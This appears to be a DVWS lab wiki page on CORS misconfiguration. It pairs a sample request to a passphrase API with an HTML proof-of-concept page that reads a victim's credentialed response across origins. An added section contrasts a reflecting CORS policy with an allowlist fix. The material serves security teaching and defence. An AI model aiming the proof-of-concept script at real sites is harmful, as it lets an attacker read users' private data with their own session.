
Cross Origin Resource Sharing Misconfiguration

Sam Sanoop edited this page Dec 26, 2020 · 3 revisions

Introduction

Cross-origin resource sharing (CORS) is a browser mechanism that enables controlled access to resources located outside of a given domain. It extends and adds flexibility to the same-origin policy (SOP). However, it also opens the door to cross-domain attacks if a website's CORS policy is poorly configured and implemented. CORS is not a protection against cross-origin attacks such as cross-site request forgery (CSRF).

Details

The request to the passphrase API requires no credentials. An attacker could leverage this to steal a user's credentials.

GET /api/v2/passphrase/test HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://dvws.local/passphrasegen.html

Proof Of Concept

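<html>
<body>
<!-- Target element for the response text -->
<p id="demo"></p>
<script>
// Send a credentialed cross-origin GET and display the response once it completes.
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    // Act only when the request has finished (readyState 4) with HTTP 200.
    if (this.readyState == 4 && this.status == 200) {
      alert(this.responseText);
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://dvws.local/api/v2/passphrase/test", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
cors();
</script>
</body>
</html>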
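Why the page above can read the response, and a server-side policy that stops it, as an added example (not part of the original wiki or the DVWS code base). It assumes the weak server reflects the request's Origin header with Access-Control-Allow-Credentials: true, since the page does not show the response headers; the function names and sample origins are constructed for illustration.

```javascript
// Added example. Sample origins are constructed; reflectPolicy models an
// assumed misconfiguration (the page does not show the response headers).
const TRUSTED_ORIGINS = new Set(["http://dvws.local"]);

// Weak: echo whatever Origin the request carries and allow credentials.
function reflectPolicy(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Hardened: exact-match allowlist; unknown origins get no CORS headers.
function allowlistPolicy(origin) {
  if (!origin || !TRUSTED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Browser-side CORS check for a simple GET: a credentialed response is
// readable only if Allow-Origin equals the requesting origin exactly
// (never "*") and Allow-Credentials is the literal string "true".
function scriptCanRead(headers, pageOrigin, withCredentials) {
  const allowOrigin = headers["Access-Control-Allow-Origin"];
  if (allowOrigin === undefined) return false;
  if (withCredentials) {
    return allowOrigin === pageOrigin &&
      headers["Access-Control-Allow-Credentials"] === "true";
  }
  return allowOrigin === "*" || allowOrigin === pageOrigin;
}

// For each requesting origin, report whether its script could read the response.
function audit(policy, origins) {
  return origins.map((o) => ({ origin: o, readable: scriptCanRead(policy(o), o, true) }));
}

const sampleOrigins = ["http://dvws.local", "http://evil.example",
  "http://dvws.local.evil.example", "null"];
console.log("reflect  :", audit(reflectPolicy, sampleOrigins));
console.log("allowlist:", audit(allowlistPolicy, sampleOrigins));
```

The allowlist compares the full origin string, so a lookalike host or the "null" origin of a sandboxed document receives no CORS headers and the browser withholds the response from the calling script.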

